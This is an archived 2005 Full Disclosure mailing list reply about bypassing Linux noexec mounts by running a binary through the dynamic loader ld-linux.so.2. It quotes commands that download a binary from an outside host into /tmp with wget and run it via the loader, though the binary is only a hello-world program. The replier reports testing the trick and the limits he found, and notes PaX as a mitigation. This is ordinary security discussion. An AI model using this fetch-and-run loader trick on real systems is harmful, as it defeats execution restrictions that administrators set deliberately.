Full Disclosure mailing list archives
Re: linux bugs (survival stories)?
From: Joachim Schipper <j.schipper () math uu nl>
Date: Wed, 13 Apr 2005 00:44:12 +0200
'hello world' can bypass noexec just remove the executable flags from the program headers the compiled binary don't even need to have executable permissions #include <stdio.h> int main(int argc, char *argv[]) { printf("Hello world!\n"); return 0; } % sudo mount -o remount,noexec /tmp % wget http://pornadmin.net/~tongson/linux/helloworld.bin -O /tmp/helloworld.bin % /lib/ld-linux.so.2 /tmp/helloworld.bin Hello world!
This does not seem to work when ld-linux.so.2 is on a filesystem mounted noexec, though [1]. Wouldn't this make it akin to calling /bin/bash hello_world.sh? PaX can stop you from mmap()ing a file and then executing the code inside, IIRC, but since this breaks X11 it's uncommon to enable the option. Joachim [1] ./ld-linux.so.2 fails when called without arguments. Checked on linux-2.6.11.7-grsec. ld-linux.so.2 was moved to a different disk before the check was made, with and without chroot and strace. Where strace was used, it showed that exec() failed. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- linux bugs (survival stories)? Bipin Gautam (Apr 11)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- Re: linux bugs (survival stories)? Georgi Guninski (Apr 12)
- Re: linux bugs (survival stories)? dk (Apr 12)
- Re: linux bugs (survival stories)? Eduardo Tongson (Apr 12)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- Re: linux bugs (survival stories)? Eduardo Tongson (Apr 12)
- Re: linux bugs (survival stories)? Joachim Schipper (Apr 12)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- Re: linux bugs (survival stories)? Eduardo Tongson (Apr 13)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- <Possible follow-ups>
- Re: linux bugs (survival stories)? pageexec (Apr 12)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)
- Re: linux bugs (survival stories)? pageexec (Apr 13)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 13)
- Re: linux bugs (survival stories)? pageexec (Apr 13)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 13)
- Re: linux bugs (survival stories)? pageexec (Apr 13)
- Re: linux bugs (survival stories)? Valdis . Kletnieks (Apr 12)